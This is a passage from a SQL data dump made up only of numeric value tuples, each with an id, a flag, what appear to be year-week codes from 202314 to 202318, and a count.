68,1,'202314',3),(4685,1,'202314',3),(4694,1,'202314',3),(4712,1,'202314',3),(4741,1,'202314',3),(4750,1,'202314',3),(4762,1,'202314',3),(4776,1,'202314',3),(4797,1,'202314',3),(4802,1,'202314',3),(4866,1,'202314',3),(4874,1,'202314',3),(4888,1,'202314',3),(4983,1,'202314',3),(4996,1,'202314',3),(5050,1,'202314',3),(5125,1,'202314',3),(5137,1,'202314',3),(5146,1,'202314',3),(5157,1,'202314',3),(5259,1,'202314',3),(102,1,'202314',4),(471,1,'202314',4),(478,1,'202314',4),(481,1,'202314',4),(482,1,'202314',4),(1614,1,'202314',4),(1703,1,'202314',4),(1737,1,'202314',4),(1774,1,'202314',4),(2148,1,'202314',4),(2152,1,'202314',4),(2154,1,'202314',4),(2178,1,'202314',4),(2252,1,'202314',4),(2558,1,'202314',4),(2769,1,'202314',4),(2813,1,'202314',4),(2911,1,'202314',4),(2964,1,'202314',4),(2991,1,'202314',4),(3006,1,'202314',4),(3027,1,'202314',4),(3069,1,'202314',4),(3087,1,'202314',4),(3261,1,'202314',4),(3263,1,'202314',4),(3271,1,'202314',4),(3282,1,'202314',4),(3290,1,'202314',4),(3313,1,'202314',4),(3316,1,'202314',4),(3438,1,'202314',4),(3479,1,'202314',4),(3482,1,'202314',4),(3498,1,'202314',4),(3735,1,'202314',4),(3777,1,'202314',4),(4357,1,'202314',4),(4387,1,'202314',4),(4396,1,'202314',4),(4517,1,'202314',4),(4566,1,'202314',4),(4612,1,'202314',4),(4651,1,'202314',4),(4657,1,'202314',4),(4681,1,'202314',4),(4765,1,'202314',4),(4792,1,'202314',4),(4897,1,'202314',4),(5071,1,'202314',4),(5122,1,'202314',4),(5326,1,'202314',4),(467,1,'202314',5),(469,1,'202314',5),(476,1,'202314',5),(479,1,'202314',5),(1606,1,'202314',5),(1701,1,'202314',5),(1707,1,'202314',5),(1718,1,'202314',5),(1722,1,'202314',5),(2617,1,'202314',5),(2956,1,'202314',5),(2989,1,'202314',5),(3045,1,'202314',5),(3102,1,'202314',5),(3127,1,'202314',5),(3229,1,'202314',5),(3285,1,'202314',5),(3771,1,'202314',5),(4323,1,'202314',5),(4332,1,'202314',5),(4420,1,'202314',5),(4529,1,'202314',5),(4582,1,'202314',5),(4674,1,'202314',5),(4697,1,'202314',5),(4703,1,'202314',5),(4722,1,'202314',5),(4744,1,'202314',5),(4756,1,'202314',5),(4768,1,'202314',5),(5037,1,'202314',5),(5046,1,'202314',5),(5067,1,'202314',5),(5080,1,'202314',5),(5140,1,'202314',5),(5264,1,'202314',5),(5292,1,'202314',5),(5295,1,'202314',5),(5298,1,'202314',5),(5307,1,'202314',5),(468,1,'202314',6),(477,1,'202314',6),(484,1,'202314',6),(1711,1,'202314',6),(1732,1,'202314',6),(2161,1,'202314',6),(2775,1,'202314',6),(2801,1,'202314',6),(3038,1,'202314',6),(4301,1,'202314',6),(4404,1,'202314',6),(4436,1,'202314',6),(4454,1,'202314',6),(4542,1,'202314',6),(4663,1,'202314',6),(4759,1,'202314',6),(4977,1,'202314',6),(5062,1,'202314',6),(5128,1,'202314',6),(5289,1,'202314',6),(5301,1,'202314',6),(5310,1,'202314',6),(5323,1,'202314',6),(108,1,'202314',7),(470,1,'202314',7),(473,1,'202314',7),(480,1,'202314',7),(486,1,'202314',7),(1604,1,'202314',7),(1745,1,'202314',7),(1770,1,'202314',7),(2159,1,'202314',7),(4338,1,'202314',7),(4520,1,'202314',7),(4677,1,'202314',7),(4771,1,'202314',7),(5134,1,'202314',7),(5256,1,'202314',7),(5268,1,'202314',7),(5317,1,'202314',7),(5320,1,'202314',7),(5330,1,'202314',7),(74,1,'202314',8),(87,1,'202314',8),(2658,1,'202314',8),(2751,1,'202314',8),(3060,1,'202314',8),(3079,1,'202314',8),(4238,1,'202314',8),(4551,1,'202314',8),(4608,1,'202314',8),(4700,1,'202314',8),(4930,1,'202314',8),(5253,1,'202314',8),(5304,1,'202314',8),(84,1,'202314',9),(472,1,'202314',9),(1766,1,'202314',9),(2457,1,'202314',9),(3030,1,'202314',9),(4412,1,'202314',9),(5314,1,'202314',9),(1724,1,'202314',10),(2503,1,'202314',10),(4645,1,'202314',10),(5076,1,'202314',10),(5276,1,'202314',10),(1608,1,'202314',11),(5271,1,'202314',11),(5280,1,'202314',11),(570,1,'202314',12),(1598,1,'202314',12),(1728,1,'202314',12),(2804,1,'202314',12),(335,1,'202314',13),(3023,1,'202314',13),(1602,1,'202314',14),(3781,1,'202314',14),(5033,1,'202314',14),(1600,1,'202314',15),(2309,1,'202314',15),(5334,1,'202314',15),(76,1,'202314',16),(91,1,'202314',16),(1592,1,'202314',16),(4706,1,'202314',16),(2809,1,'202314',17),(4457,1,'202314',17),(1596,1,'202314',18),(1610,1,'202314',19),(3066,1,'202314',19),(1612,1,'202314',20),(68,1,'202314',21),(1586,1,'202314',21),(2904,1,'202314',21),(3083,1,'202314',22),(1588,1,'202314',23),(89,1,'202314',24),(1544,1,'202314',24),(72,1,'202314',25),(1594,1,'202314',25),(1582,1,'202314',26),(5163,1,'202314',32),(3764,1,'202314',39),(80,1,'202314',124),(9,1,'202314',627),(471,1,'202315',1),(482,1,'202315',1),(483,1,'202315',1),(485,1,'202315',1),(486,1,'202315',1),(1701,1,'202315',1),(1707,1,'202315',1),(1713,1,'202315',1),(1734,1,'202315',1),(1739,1,'202315',1),(1768,1,'202315',1),(1772,1,'202315',1),(1782,1,'202315',1),(2150,1,'202315',1),(2156,1,'202315',1),(2159,1,'202315',1),(2296,1,'202315',1),(2558,1,'202315',1),(2617,1,'202315',1),(2748,1,'202315',1),(2991,1,'202315',1),(3034,1,'202315',1),(3045,1,'202315',1),(3096,1,'202315',1),(3109,1,'202315',1),(3229,1,'202315',1),(3240,1,'202315',1),(3245,1,'202315',1),(3267,1,'202315',1),(3269,1,'202315',1),(3278,1,'202315',1),(3297,1,'202315',1),(3482,1,'202315',1),(3541,1,'202315',1),(3727,1,'202315',1),(3752,1,'202315',1),(3777,1,'202315',1),(4275,1,'202315',1),(4329,1,'202315',1),(4332,1,'202315',1),(4357,1,'202315',1),(4396,1,'202315',1),(4424,1,'202315',1),(4524,1,'202315',1),(4566,1,'202315',1),(4591,1,'202315',1),(4651,1,'202315',1),(4668,1,'202315',1),(4681,1,'202315',1),(4688,1,'202315',1),(4694,1,'202315',1),(4712,1,'202315',1),(4744,1,'202315',1),(4750,1,'202315',1),(4756,1,'202315',1),(4866,1,'202315',1),(4897,1,'202315',1),(4988,1,'202315',1),(4996,1,'202315',1),(5042,1,'202315',1),(5080,1,'202315',1),(5101,1,'202315',1),(5131,1,'202315',1),(5248,1,'202315',1),(467,1,'202315',2),(479,1,'202315',2),(484,1,'202315',2),(488,1,'202315',2),(1584,1,'202315',2),(1699,1,'202315',2),(1703,1,'202315',2),(1705,1,'202315',2),(1715,1,'202315',2),(1730,1,'202315',2),(1743,1,'202315',2),(1747,1,'202315',2),(1749,1,'202315',2),(1751,1,'202315',2),(1778,1,'202315',2),(1780,1,'202315',2),(2063,1,'202315',2),(2161,1,'202315',2),(2165,1,'202315',2),(2248,1,'202315',2),(2293,1,'202315',2),(2801,1,'202315',2),(2911,1,'202315',2),(2956,1,'202315',2),(2964,1,'202315',2),(2965,1,'202315',2),(2989,1,'202315',2),(3090,1,'202315',2),(3251,1,'202315',2),(3261,1,'202315',2),(3263,1,'202315',2),(3265,1,'202315',2),(3271,1,'202315',2),(3275,1,'202315',2),(3285,1,'202315',2),(3307,1,'202315',2),(3489,1,'202315',2),(3710,1,'202315',2),(3731,1,'202315',2),(3735,1,'202315',2),(3738,1,'202315',2),(3746,1,'202315',2),(3749,1,'202315',2),(3771,1,'202315',2),(4301,1,'202315',2),(4363,1,'202315',2),(4373,1,'202315',2),(4377,1,'202315',2),(4382,1,'202315',2),(4387,1,'202315',2),(4400,1,'202315',2),(4408,1,'202315',2),(4546,1,'202315',2),(4582,1,'202315',2),(4654,1,'202315',2),(4660,1,'202315',2),(4697,1,'202315',2),(4747,1,'202315',2),(4771,1,'202315',2),(4797,1,'202315',2),(4802,1,'202315',2),(4983,1,'202315',2),(5024,1,'202315',2),(5046,1,'202315',2),(5058,1,'202315',2),(5125,1,'202315',2),(5134,1,'202315',2),(5137,1,'202315',2),(5146,1,'202315',2),(5259,1,'202315',2),(5289,1,'202315',2),(5292,1,'202315',2),(5304,1,'202315',2),(5326,1,'202315',2),(102,1,'202315',3),(472,1,'202315',3),(474,1,'202315',3),(476,1,'202315',3),(1697,1,'202315',3),(1709,1,'202315',3),(1711,1,'202315',3),(1766,1,'202315',3),(1776,1,'202315',3),(2154,1,'202315',3),(2704,1,'202315',3),(3006,1,'202315',3),(3038,1,'202315',3),(3041,1,'202315',3),(3072,1,'202315',3),(3092,1,'202315',3),(3104,1,'202315',3),(3124,1,'202315',3),(3243,1,'202315',3),(3253,1,'202315',3),(3257,1,'202315',3),(3259,1,'202315',3),(3273,1,'202315',3),(3280,1,'202315',3),(3282,1,'202315',3),(3287,1,'202315',3),(3290,1,'202315',3),(3313,1,'202315',3),(3498,1,'202315',3),(3774,1,'202315',3),(4323,1,'202315',3),(4326,1,'202315',3),(4335,1,'202315',3),(4432,1,'202315',3),(4440,1,'202315',3),(4454,1,'202315',3),(4529,1,'202315',3),(4608,1,'202315',3),(4691,1,'202315',3),(4762,1,'202315',3),(4858,1,'202315',3),(4874,1,'202315',3),(4878,1,'202315',3),(4883,1,'202315',3),(4888,1,'202315',3),(4976,1,'202315',3),(5028,1,'202315',3),(5050,1,'202315',3),(5054,1,'202315',3),(5067,1,'202315',3),(5157,1,'202315',3),(5295,1,'202315',3),(5301,1,'202315',3),(5314,1,'202315',3),(1590,1,'202315',4),(1604,1,'202315',4),(1718,1,'202315',4),(2148,1,'202315',4),(3005,1,'202315',4),(3063,1,'202315',4),(3079,1,'202315',4),(3102,1,'202315',4),(3107,1,'202315',4),(3117,1,'202315',4),(3226,1,'202315',4),(3479,1,'202315',4),(4416,1,'202315',4),(4420,1,'202315',4),(4428,1,'202315',4),(4444,1,'202315',4),(4448,1,'202315',4),(4587,1,'202315',4),(4612,1,'202315',4),(4648,1,'202315',4),(4657,1,'202315',4),(4677,1,'202315',4),(4753,1,'202315',4),(4977,1,'202315',4),(4980,1,'202315',4),(5128,1,'202315',4),(5268,1,'202315',4),(5298,1,'202315',4),(5310,1,'202315',4),(473,1,'202315',5),(1737,1,'202315',5),(2178,1,'202315',5),(2297,1,'202315',5),(2769,1,'202315',5),(2775,1,'202315',5),(2813,1,'202315',5),(3004,1,'202315',5),(3069,1,'202315',5),(3430,1,'202315',5),(4341,1,'202315',5),(4556,1,'202315',5),(4674,1,'202315',5),(4759,1,'202315',5),(5076,1,'202315',5),(5153,1,'202315',5),(5280,1,'202315',5),(5307,1,'202315',5),(74,1,'202315',6),(468,1,'202315',6),(487,1,'202315',6),(1606,1,'202315',6),(1614,1,'202315',6),(2457,1,'202315',6),(2751,1,'202315',6),(3127,1,'202315',6),(5062,1,'202315',6),(5271,1,'202315',6),(570,1,'202315',7),(4238,1,'202315',7),(4338,1,'202315',7),(4391,1,'202315',7),(4709,1,'202315',7),(4722,1,'202315',7),(5071,1,'202315',7),(5256,1,'202315',7),(5323,1,'202315',7),(469,1,'202315',8),(2658,1,'202315',8),(4663,1,'202315',8),(5253,1,'202315',8),(108,1,'202315',9),(1602,1,'202315',9),(1608,1,'202315',9),(1745,1,'202315',9),(2609,1,'202315',9),(4457,1,'202315',9),(5317,1,'202315',9),(5320,1,'202315',9),(2503,1,'202315',10),(3023,1,'202315',10),(3030,1,'202315',10),(3060,1,'202315',10),(4551,1,'202315',10),(4645,1,'202315',10),(4700,1,'202315',10),(5334,1,'202315',10),(470,1,'202315',11),(1592,1,'202315',11),(1728,1,'202315',11),(5264,1,'202315',11),(84,1,'202315',12),(1598,1,'202315',12),(1600,1,'202315',12),(4436,1,'202315',12),(4520,1,'202315',12),(4542,1,'202315',12),(5276,1,'202315',12),(2809,1,'202315',13),(4930,1,'202315',13),(87,1,'202315',14),(2804,1,'202315',14),(3083,1,'202315',14),(5033,1,'202315',14),(76,1,'202315',15),(3066,1,'202315',15),(4412,1,'202315',15),(1724,1,'202315',16),(3781,1,'202315',16),(335,1,'202315',17),(1544,1,'202315',17),(1610,1,'202315',17),(4706,1,'202315',17),(1594,1,'202315',18),(91,1,'202315',19),(1586,1,'202315',19),(1612,1,'202315',19),(1588,1,'202315',20),(2309,1,'202315',20),(68,1,'202315',21),(89,1,'202315',23),(3764,1,'202315',23),(72,1,'202315',24),(1596,1,'202315',24),(5163,1,'202315',27),(1582,1,'202315',29),(2904,1,'202315',47),(80,1,'202315',112),(9,1,'202315',675),(1697,1,'202316',1),(1709,1,'202316',1),(1720,1,'202316',1),(1726,1,'202316',1),(1732,1,'202316',1),(1739,1,'202316',1),(1749,1,'202316',1),(1772,1,'202316',1),(2152,1,'202316',1),(2252,1,'202316',1),(2993,1,'202316',1),(3072,1,'202316',1),(3096,1,'202316',1),(3127,1,'202316',1),(3240,1,'202316',1),(3249,1,'202316',1),(3251,1,'202316',1),(3267,1,'202316',1),(3275,1,'202316',1),(3278,1,'202316',1),(3287,1,'202316',1),(3534,1,'202316',1),(3746,1,'202316',1),(3774,1,'202316',1),(4275,1,'202316',1),(4363,1,'202316',1),(4373,1,'202316',1),(4387,1,'202316',1),(4396,1,'202316',1),(4400,1,'202316',1),(4408,1,'202316',1),(4428,1,'202316',1),(4432,1,'202316',1),(4444,1,'202316',1),(4648,1,'202316',1),(4651,1,'202316',1),(4654,1,'202316',1),(4744,1,'202316',1),(4756,1,'202316',1),(4870,1,'202316',1),(4897,1,'202316',1),(4988,1,'202316',1),(5020,1,'202316',1),(5028,1,'202316',1),(5058,1,'202316',1),(110,1,'202316',2),(476,1,'202316',2),(1695,1,'202316',2),(1699,1,'202316',2),(1705,1,'202316',2),(1707,1,'202316',2),(1730,1,'202316',2),(1741,1,'202316',2),(1743,1,'202316',2),(1768,1,'202316',2),(1782,1,'202316',2),(2063,1,'202316',2),(2150,1,'202316',2),(2154,1,'202316',2),(2156,1,'202316',2),(2161,1,'202316',2),(2617,1,'202316',2),(2991,1,'202316',2),(3027,1,'202316',2),(3041,1,'202316',2),(3063,1,'202316',2),(3109,1,'202316',2),(3117,1,'202316',2),(3229,1,'202316',2),(3261,1,'202316',2),(3273,1,'202316',2),(3282,1,'202316',2),(3313,1,'202316',2),(3316,1,'202316',2),(3438,1,'202316',2),(3486,1,'202316',2),(3489,1,'202316',2),(3541,1,'202316',2),(3724,1,'202316',2),(3738,1,'202316',2),(3742,1,'202316',2),(3749,1,'202316',2),(3752,1,'202316',2),(4323,1,'202316',2),(4326,1,'202316',2),(4341,1,'202316',2),(4357,1,'202316',2),(4368,1,'202316',2),(4377,1,'202316',2),(4382,1,'202316',2),(4404,1,'202316',2),(4514,1,'202316',2),(4582,1,'202316',2),(4591,1,'202316',2),(4753,1,'202316',2),(4762,1,'202316',2),(4858,1,'202316',2),(4866,1,'202316',2),(4883,1,'202316',2),(4888,1,'202316',2),(4893,1,'202316',2),(4976,1,'202316',2),(5037,1,'202316',2),(5042,1,'202316',2),(5046,1,'202316',2),(5131,1,'202316',2),(5153,1,'202316',2),(5248,1,'202316',2),(5271,1,'202316',2),(478,1,'202316',3),(479,1,'202316',3),(480,1,'202316',3),(484,1,'202316',3),(1713,1,'202316',3),(1715,1,'202316',3),(1722,1,'202316',3),(1734,1,'202316',3),(1737,1,'202316',3),(1747,1,'202316',3),(1770,1,'202316',3),(1774,1,'202316',3),(1776,1,'202316',3),(1778,1,'202316',3),(1780,1,'202316',3),(2165,1,'202316',3),(2293,1,'202316',3),(2297,1,'202316',3),(2558,1,'202316',3),(2775,1,'202316',3),(2801,1,'202316',3),(2956,1,'202316',3),(3006,1,'202316',3),(3023,1,'202316',3),(3034,1,'202316',3),(3079,1,'202316',3),(3243,1,'202316',3),(3257,1,'202316',3),(3263,1,'202316',3),(3269,1,'202316',3),(3531,1,'202316',3),(3727,1,'202316',3),(3731,1,'202316',3),(3735,1,'202316',3),(4332,1,'202316',3),(4420,1,'202316',3),(4424,1,'202316',3),(4448,1,'202316',3),(4517,1,'202316',3),(4546,1,'202316',3),(4566,1,'202316',3),(4587,1,'202316',3),(4657,1,'202316',3),(4668,1,'202316',3),(4681,1,'202316',3),(4750,1,'202316',3),(4759,1,'202316',3),(4765,1,'202316',3),(4768,1,'202316',3),(4792,1,'202316',3),(4977,1,'202316',3),(5050,1,'202316',3),(5071,1,'202316',3),(5125,1,'202316',3),(5137,1,'202316',3),(102,1,'202316',4),(481,1,'202316',4),(485,1,'202316',4),(1584,1,'202316',4),(1701,1,'202316',4),(1703,1,'202316',4),(1718,1,'202316',4),(2178,1,'202316',4),(2609,1,'202316',4),(2813,1,'202316',4),(2911,1,'202316',4),(3038,1,'202316',4),(3045,1,'202316',4),(3087,1,'202316',4),(3092,1,'202316',4),(3097,1,'202316',4),(3104,1,'202316',4),(3124,1,'202316',4),(3247,1,'202316',4),(3253,1,'202316',4),(3271,1,'202316',4),(3290,1,'202316',4),(3297,1,'202316',4),(3430,1,'202316',4),(3482,1,'202316',4),(3714,1,'202316',4),(3771,1,'202316',4),(3777,1,'202316',4),(4329,1,'202316',4),(4556,1,'202316',4),(4660,1,'202316',4),(4685,1,'202316',4),(4694,1,'202316',4),(4712,1,'202316',4),(4741,1,'202316',4),(4771,1,'202316',4),(4983,1,'202316',4),(4996,1,'202316',4),(5054,1,'202316',4),(5062,1,'202316',4),(5101,1,'202316',4),(5157,1,'202316',4),(5259,1,'202316',4),(5268,1,'202316',4),(5289,1,'202316',4),(469,1,'202316',5),(471,1,'202316',5),(477,1,'202316',5),(482,1,'202316',5),(483,1,'202316',5),(488,1,'202316',5),(1590,1,'202316',5),(1745,1,'202316',5),(2148,1,'202316',5),(2248,1,'202316',5),(2658,1,'202316',5),(2748,1,'202316',5),(2964,1,'202316',5),(2965,1,'202316',5),(3005,1,'202316',5),(3090,1,'202316',5),(3107,1,'202316',5),(3285,1,'202316',5),(3479,1,'202316',5),(3710,1,'202316',5),(3721,1,'202316',5),(4542,1,'202316',5),(4608,1,'202316',5),(4612,1,'202316',5),(4691,1,'202316',5),(4703,1,'202316',5),(4797,1,'202316',5),(4802,1,'202316',5),(4862,1,'202316',5),(4874,1,'202316',5),(4980,1,'202316',5),(5080,1,'202316',5),(5122,1,'202316',5),(5128,1,'202316',5),(5134,1,'202316',5),(5140,1,'202316',5),(5253,1,'202316',5),(5326,1,'202316',5),(5330,1,'202316',5),(108,1,'202316',6),(473,1,'202316',6),(486,1,'202316',6),(1600,1,'202316',6),(1606,1,'202316',6),(1614,1,'202316',6),(1711,1,'202316',6),(1766,1,'202316',6),(2751,1,'202316',6),(3004,1,'202316',6),(3102,1,'202316',6),(3498,1,'202316',6),(4301,1,'202316',6),(4416,1,'202316',6),(4524,1,'202316',6),(4529,1,'202316',6),(4688,1,'202316',6),(4697,1,'202316',6),(4747,1,'202316',6),(5067,1,'202316',6),(5146,1,'202316',6),(5314,1,'202316',6),(5317,1,'202316',6),(467,1,'202316',7),(3226,1,'202316',7),(4436,1,'202316',7),(4709,1,'202316',7),(4722,1,'202316',7),(5076,1,'202316',7),(5301,1,'202316',7),(468,1,'202316',8),(472,1,'202316',8),(2159,1,'202316',8),(2296,1,'202316',8),(2704,1,'202316',8),(2989,1,'202316',8),(4551,1,'202316',8),(5276,1,'202316',8),(5280,1,'202316',8),(5295,1,'202316',8),(5298,1,'202316',8),(5334,1,'202316',8),(470,1,'202316',9),(474,1,'202316',9),(1598,1,'202316',9),(2769,1,'202316',9),(3060,1,'202316',9),(4454,1,'202316',9),(4645,1,'202316',9),(4700,1,'202316',9),(5256,1,'202316',9),(5264,1,'202316',9),(5292,1,'202316',9),(5323,1,'202316',9),(487,1,'202316',10),(1592,1,'202316',10),(1724,1,'202316',10),(2457,1,'202316',10),(2503,1,'202316',10),(4335,1,'202316',10),(4338,1,'202316',10),(4391,1,'202316',10),(4663,1,'202316',10),(4776,1,'202316',10),(5310,1,'202316',10),(5320,1,'202316',10),(74,1,'202316',11),(84,1,'202316',11),(570,1,'202316',11),(1604,1,'202316',11),(1608,1,'202316',11),(4677,1,'202316',11),(5304,1,'202316',11),(5307,1,'202316',11),(1602,1,'202316',12),(3030,1,'202316',12),(3066,1,'202316',12),(3069,1,'202316',12),(4238,1,'202316',12),(4412,1,'202316',12),(3781,1,'202316',13),(76,1,'202316',14),(4520,1,'202316',14),(4674,1,'202316',14),(2804,1,'202316',15),(87,1,'202316',16),(1610,1,'202316',16),(3083,1,'202316',16),(5033,1,'202316',16),(335,1,'202316',17),(4457,1,'202316',17),(91,1,'202316',18),(2309,1,'202316',18),(2904,1,'202316',18),(4706,1,'202316',18),(1596,1,'202316',19),(68,1,'202316',20),(89,1,'202316',20),(1544,1,'202316',20),(1728,1,'202316',20),(3764,1,'202316',20),(4930,1,'202316',20),(1586,1,'202316',21),(1588,1,'202316',21),(2809,1,'202316',21),(1594,1,'202316',24),(1612,1,'202316',28),(1582,1,'202316',30),(72,1,'202316',35),(5163,1,'202316',42),(80,1,'202316',126),(9,1,'202316',663),(110,1,'202317',1),(476,1,'202317',1),(482,1,'202317',1),(483,1,'202317',1),(1695,1,'202317',1),(1705,1,'202317',1),(1720,1,'202317',1),(1768,1,'202317',1),(1776,1,'202317',1),(2063,1,'202317',1),(2150,1,'202317',1),(2161,1,'202317',1),(2248,1,'202317',1),(2252,1,'202317',1),(2558,1,'202317',1),(2609,1,'202317',1),(2964,1,'202317',1),(2991,1,'202317',1),(3104,1,'202317',1),(3109,1,'202317',1),(3271,1,'202317',1),(3278,1,'202317',1),(3316,1,'202317',1),(3749,1,'202317',1),(4301,1,'202317',1),(4387,1,'202317',1),(4408,1,'202317',1),(4424,1,'202317',1),(4428,1,'202317',1),(4440,1,'202317',1),(4546,1,'202317',1),(4591,1,'202317',1),(4688,1,'202317',1),(4797,1,'202317',1),(4802,1,'202317',1),(4888,1,'202317',1),(5020,1,'202317',1),(5330,1,'202317',1),(106,1,'202317',2),(469,1,'202317',2),(479,1,'202317',2),(484,1,'202317',2),(1584,1,'202317',2),(1697,1,'202317',2),(1713,1,'202317',2),(1715,1,'202317',2),(1730,1,'202317',2),(1732,1,'202317',2),(1734,1,'202317',2),(1737,1,'202317',2),(1741,1,'202317',2),(1743,1,'202317',2),(1770,1,'202317',2),(1782,1,'202317',2),(2156,1,'202317',2),(2704,1,'202317',2),(2748,1,'202317',2),(2965,1,'202317',2),(3005,1,'202317',2),(3087,1,'202317',2),(3097,1,'202317',2),(3107,1,'202317',2),(3124,1,'202317',2),(3127,1,'202317',2),(3261,1,'202317',2),(3263,1,'202317',2),(3267,1,'202317',2),(3275,1,'202317',2),(3280,1,'202317',2),(3282,1,'202317',2),(3287,1,'202317',2),(3724,1,'202317',2),(4329,1,'202317',2),(4382,1,'202317',2),(4396,1,'202317',2),(4432,1,'202317',2),(4858,1,'202317',2),(4866,1,'202317',2),(4893,1,'202317',2),(4897,1,'202317',2),(5028,1,'202317',2),(5037,1,'202317',2),(5146,1,'202317',2),(5248,1,'202317',2),(5259,1,'202317',2),(5326,1,'202317',2),(102,1,'202317',3),(472,1,'202317',3),(480,1,'202317',3),(485,1,'202317',3),(486,1,'202317',3),(1718,1,'202317',3),(1726,1,'202317',3),(1739,1,'202317',3),(1747,1,'202317',3),(1749,1,'202317',3),(1751,1,'202317',3),(1772,1,'202317',3),(2152,1,'202317',3),(2178,1,'202317',3),(2956,1,'202317',3),(2993,1,'202317',3),(3096,1,'202317',3),(3226,1,'202317',3),(3229,1,'202317',3),(3243,1,'202317',3),(3247,1,'202317',3),(3249,1,'202317',3),(3257,1,'202317',3),(3482,1,'202317',3),(3727,1,'202317',3),(3731,1,'202317',3),(3735,1,'202317',3),(3742,1,'202317',3),(4275,1,'202317',3),(4368,1,'202317',3),(4373,1,'202317',3),(4404,1,'202317',3),(4444,1,'202317',3),(4517,1,'202317',3),(4556,1,'202317',3),(4654,1,'202317',3),(4668,1,'202317',3),(4685,1,'202317',3),(4862,1,'202317',3),(4874,1,'202317',3),(4883,1,'202317',3),(5024,1,'202317',3),(5050,1,'202317',3),(5067,1,'202317',3),(5153,1,'202317',3),(481,1,'202317',4),(488,1,'202317',4),(1606,1,'202317',4),(1701,1,'202317',4),(1707,1,'202317',4),(1711,1,'202317',4),(1745,1,'202317',4),(2297,1,'202317',4),(2457,1,'202317',4),(2617,1,'202317',4),(2751,1,'202317',4),(2775,1,'202317',4),(3004,1,'202317',4),(3045,1,'202317',4),(3090,1,'202317',4),(3092,1,'202317',4),(3240,1,'202317',4),(3245,1,'202317',4),(3253,1,'202317',4),(3259,1,'202317',4),(3265,1,'202317',4),(3285,1,'202317',4),(3290,1,'202317',4),(3313,1,'202317',4),(3486,1,'202317',4),(3710,1,'202317',4),(3752,1,'202317',4),(4332,1,'202317',4),(4341,1,'202317',4),(4377,1,'202317',4),(4587,1,'202317',4),(4651,1,'202317',4),(4657,1,'202317',4),(4703,1,'202317',4),(4878,1,'202317',4),(4996,1,'202317',4),(5042,1,'202317',4),(5046,1,'202317',4),(5058,1,'202317',4),(5140,1,'202317',4),(1709,1,'202317',5),(1774,1,'202317',5),(2159,1,'202317',5),(2801,1,'202317',5),(2911,1,'202317',5),(2989,1,'202317',5),(3034,1,'202317',5),(3060,1,'202317',5),(3079,1,'202317',5),(3102,1,'202317',5),(3430,1,'202317',5),(3438,1,'202317',5),(3498,1,'202317',5),(3531,1,'202317',5),(3746,1,'202317',5),(4391,1,'202317',5),(4416,1,'202317',5),(4514,1,'202317',5),(4566,1,'202317',5),(4582,1,'202317',5),(4608,1,'202317',5),(4612,1,'202317',5),(4648,1,'202317',5),(4691,1,'202317',5),(4697,1,'202317',5),(4870,1,'202317',5),(5054,1,'202317',5),(5292,1,'202317',5),(5304,1,'202317',5),(2154,1,'202317',6),(2165,1,'202317',6),(2813,1,'202317',6),(3063,1,'202317',6),(3489,1,'202317',6),(3534,1,'202317',6),(3721,1,'202317',6),(3738,1,'202317',6),(3774,1,'202317',6),(4338,1,'202317',6),(4357,1,'202317',6),(4420,1,'202317',6),(4454,1,'202317',6),(4542,1,'202317',6),(4660,1,'202317',6),(4744,1,'202317',6),(4747,1,'202317',6),(4771,1,'202317',6),(4980,1,'202317',6),(5071,1,'202317',6),(5080,1,'202317',6),(5157,1,'202317',6),(5289,1,'202317',6),(5295,1,'202317',6),(1592,1,'202317',7),(1766,1,'202317',7),(2148,1,'202317',7),(2769,1,'202317',7),(3023,1,'202317',7),(3038,1,'202317',7),(3307,1,'202317',7),(3714,1,'202317',7),(4323,1,'202317',7),(4524,1,'202317',7),(4663,1,'202317',7),(4741,1,'202317',7),(4750,1,'202317',7),(4753,1,'202317',7),(4756,1,'202317',7),(4759,1,'202317',7),(5062,1,'202317',7),(5122,1,'202317',7),(5125,1,'202317',7),(5137,1,'202317',7),(5271,1,'202317',7),(5310,1,'202317',7),(1608,1,'202317',8),(1724,1,'202317',8),(3072,1,'202317',8),(3117,1,'202317',8),(3297,1,'202317',8),(3777,1,'202317',8),(4520,1,'202317',8),(4681,1,'202317',8),(4712,1,'202317',8),(4722,1,'202317',8),(4762,1,'202317',8),(4768,1,'202317',8),(4776,1,'202317',8),(5101,1,'202317',8),(5298,1,'202317',8),(1614,1,'202317',9),(2658,1,'202317',9),(4400,1,'202317',9),(4448,1,'202317',9),(4700,1,'202317',9),(4977,1,'202317',9),(4988,1,'202317',9),(5033,1,'202317',9),(1722,1,'202317',10),(3069,1,'202317',10),(3479,1,'202317',10),(3771,1,'202317',10),(4326,1,'202317',10),(4436,1,'202317',10),(4674,1,'202317',10),(4709,1,'202317',10),(5076,1,'202317',10),(5131,1,'202317',10),(5253,1,'202317',10),(5280,1,'202317',10),(5301,1,'202317',10),(5314,1,'202317',10),(470,1,'202317',11),(487,1,'202317',11),(1544,1,'202317',11),(1602,1,'202317',11),(4238,1,'202317',11),(4335,1,'202317',11),(4457,1,'202317',11),(4694,1,'202317',11),(4983,1,'202317',11),(5268,1,'202317',11),(1600,1,'202317',12),(1604,1,'202317',12),(2804,1,'202317',12),(3027,1,'202317',12),(4551,1,'202317',12),(4645,1,'202317',12),(4765,1,'202317',12),(5134,1,'202317',12),(474,1,'202317',13),(1598,1,'202317',13),(3030,1,'202317',13),(4412,1,'202317',13),(5256,1,'202317',13),(5264,1,'202317',13),(5307,1,'202317',13),(84,1,'202317',14),(1588,1,'202317',14),(5276,1,'202317',14),(5320,1,'202317',14),(473,1,'202317',15),(4677,1,'202317',15),(4976,1,'202317',15),(570,1,'202317',16),(1596,1,'202317',16),(1612,1,'202317',16),(2503,1,'202317',16),(3764,1,'202317',16),(4529,1,'202317',16),(5128,1,'202317',16),(74,1,'202317',17),(108,1,'202317',17),(5323,1,'202317',17),(1594,1,'202317',18),(1610,1,'202317',18),(3066,1,'202317',18),(87,1,'202317',19),(4930,1,'202317',19),(5163,1,'202317',19),(1728,1,'202317',20),(3083,1,'202317',20),(5317,1,'202317',20),(468,1,'202317',21),(4706,1,'202317',21),(1582,1,'202317',22),(1586,1,'202317',23),(89,1,'202317',24),(2309,1,'202317',24),(5334,1,'202317',24),(335,1,'202317',25),(2809,1,'202317',26),(76,1,'202317',28),(91,1,'202317',28),(2904,1,'202317',28),(3781,1,'202317',29),(68,1,'202317',32),(72,1,'202317',34),(80,1,'202317',147),(9,1,'202317',776),(1697,1,'202318',1),(1715,1,'202318',1),(1770,1,'202318',1),(2161,1,'202318',1),(2297,1,'202318',1),(2748,1,'202318',1),(2964,1,'202318',1),(3023,1,'202318',1),(3034,1,'202318',1),(3287,1,'202318',1),(3489,1,'202318',1)